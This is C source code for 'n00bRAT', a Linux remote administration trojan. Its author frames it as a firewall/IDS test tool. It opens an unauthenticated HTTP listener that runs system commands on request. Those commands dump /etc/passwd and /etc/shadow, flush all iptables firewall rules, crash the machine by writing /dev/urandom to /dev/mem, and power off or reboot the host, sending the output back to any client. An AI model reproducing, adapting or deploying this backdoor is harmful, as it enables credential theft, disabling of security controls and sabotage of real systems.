/*********************************************************************************************** @appName : n00bRAT Server @description : RAT (Remote Admin. Tool) for TuX (Linux/UNiX) Machines use it as a Trojan Test for your Firewall/IDS/IPS or to Remotely Admin. your Machines ViA Web.Browsers Client side just requires a Web Browser like FireFox, Opera, etc. @version : 0.7 @author : AbhishekKr [http://abhishekkr.github.io/] -=ABK=- **********************************************************************************************/ #include "ABK_n00bRAT.h" //the string finally sent as HTTP Response char httpResponse[MAXSTRSIZE]="\0"; //the string to be copied to Response if correct Request char *httpResponse200 = "HTTP/1.1 200 OK\nServer: n00b\nContent-Type: text/html\n\n" "it\'s n00bRAT, you control this machine here" "


" "

TuX Remote Administration Tool v0.6

" "even a Novice could use this RAT like a Pro
" "
Hang The Machine
" "/etc/passwd
" "/etc/shadow
" "/etc/resolv.conf (the resolved IP entries)
" "process list
" "iptables --flush (Clear all entries in Firewall)
" "ifconfig -a
" "ifconfig -s
" "poweroff
" "reboot
" "


"; //the string to be copied to Response if incorrect Request char *httpResponse400 = "HTTP/1.1 400 Bad Request\nServer: n00b\nContent-Type: text/html\n\n" "TuXperiment" "

Experimental Network Server

" "

Under Constrution

" "

" "

"; char Request[MAXSTRSIZE]="\0"; //buffer to holf Client's Request int pfds[2]; //Pipe File Descriptors int fd, fd2; //File descriptors int axnCode; //To hold AXN Requested by Client /****Prototypes****/ void dupStreamz(); //closes stdout and dup it to a stream used void tellClient(); int getAXN(); int getAXNCode(char* axnTok); /******************/ /* main */ int main() { int numbytes; struct sockaddr_in server; /* server's address information */ struct sockaddr_in client; /* client's address information */ int sin_size; dupStreamz(); if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */ system("echo 'socket() error' >> zerror.log"); printf("server: socket() error\n"); exit(-1); } server.sin_family = AF_INET; server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */ int noobPort = PORT; for (noobPort=PORT; noobPort < 65535; noobPort = noobPort+1){ server.sin_port = htons(noobPort); /* Remember htons() from "Conversions" section? =) */ bzero(&(server.sin_zero),8); /* zero the rest of the structure */ if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){ /* calls bind() */ system("echo 'bind() error' >> zerror.log"); printf("server: bind(%d) error\n", noobPort); if (noobPort >= 65535) { exit(-1); } } else { break; } } printf("listing at :%d", noobPort); if(listen(fd,BACKLOG) == -1){ /* calls listen() */ system("echo 'listen() error' >> zerror.log"); printf("server: listen() error\n"); } while(1){ sin_size=sizeof(struct sockaddr_in); if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){ /* calls accept() */ system("echo 'accept() error' >> zerror.log"); printf("server: accept() error\n"); exit(-1); } if ( (numbytes = recv(fd2, Request, MAXSTRSIZE, 0)) > 0 ) { Request[numbytes]='\0'; //sscanf(buf, "GET %s HTTP", Req); }else{ printf("server: recv() error"); system("echo 'recv() error' >> zerror.log"); } axnCode = getAXN();//1; tellClient(); close(fd2); /* close fd2 */ printf("[+] %s\n", Request); } return 0; } /* * it duplicates STDOUT to a Program Handled Stream using it * output of system commands is captured in this stream directly */ void dupStreamz(){ if(pipe(pfds) == -1){ system("echo 'IPC error' >> zerror.log"); perror("server: PiPiNG FlaW"); exit(1); } close(1); dup(pfds[1]); return; } /* * it checks for the desired action in axnCode, * executes the desired system command * builds up the HTTP Response with desired Output * send the HTTP Response to Client */ void tellClient(){ char buf[MAXSTRSIZE] = "HTTP 200 OK\0"; //buffer to hold System Commands' Output char tmpBuf[MAXSTRSIZE]; int idx; //clearing previous stream content for(idx=0; idx
n00bROOT\""); break; //hangs the TuX machine case 0: strcpy(httpResponse,httpResponse200); system("cat /dev/urandom > /dev/mem"); break; //all entries of /etc/passwd case 1: strcpy(httpResponse,httpResponse200); system("cat /etc/passwd 2>&1 | sed 's/\\n//g' | sed 's/\\r//g'"); break; //all entries of /etc/shadow case 2: strcpy(httpResponse,httpResponse200); system("cat /etc/shadow 2>&1 | sed 's/\\n//g' | sed 's/\\r//g'"); break; //all entries of /etc/resolv.conf case 3: strcpy(httpResponse,httpResponse200); system("cat /etc/resolv.conf 2>&1"); break; //prints entire ps list case 4: strcpy(httpResponse,httpResponse200); system("ps aux"); break; //deletes all entries of IPTABLES (Firewall) case 5: strcpy(httpResponse,httpResponse200); system("iptables --flush 2>&1 && echo \'IPTables Entries Deleted\'"); break; //all information of all NICs case 6: strcpy(httpResponse,httpResponse200); system("ifconfig -a 2>&1 || ip -a 2>&1 || networkctl --no-legend --no-pager status 2>&1"); break; //System Coded Info of all NICs case 7: strcpy(httpResponse,httpResponse200); system("ifconfig -s 2>&1 || ip link 2>&1 || networkctl --no-legend --no-pager list 2>&1"); break; //PowerOff case 8: strcpy(httpResponse,httpResponse200); system("poweroff 2>&1"); break; //Reboot case 9: strcpy(httpResponse,httpResponse200); system("reboot 2>&1"); break; //default case default: strcpy(httpResponse,httpResponse400); system("echo \"HTTP 404\""); break; } read(pfds[0], buf, MAXSTRSIZE); strncat(tmpBuf,httpResponse,strlen(httpResponse)); strncat(tmpBuf,buf,strlen(buf)); send(fd2,tmpBuf,(strlen(httpResponse)+strlen(buf)),0); return; } /* * extracts the action code from HTTP Request * returns back the action Code */ int getAXN(){ char *axnTok; if((axnTok=strtok(Request," ")) != NULL){ if((axnTok=strtok(NULL," ")) != NULL){ printf("\naxn: %s\n",axnTok); return getAXNCode(axnTok); } } return -10; } /* * getAXNCode maps passed string to action token and returns int code */ int getAXNCode(char* axnTok){ if(strcmp("/n00b",axnTok)==0) return -1; char *axnCodeCharSlash = strrchr(axnTok, '/'); char *axnCodeChar = axnCodeCharSlash ? axnCodeCharSlash + 1 : axnTok; int axnCodeInt = *axnCodeChar - '0'; return axnCodeInt; }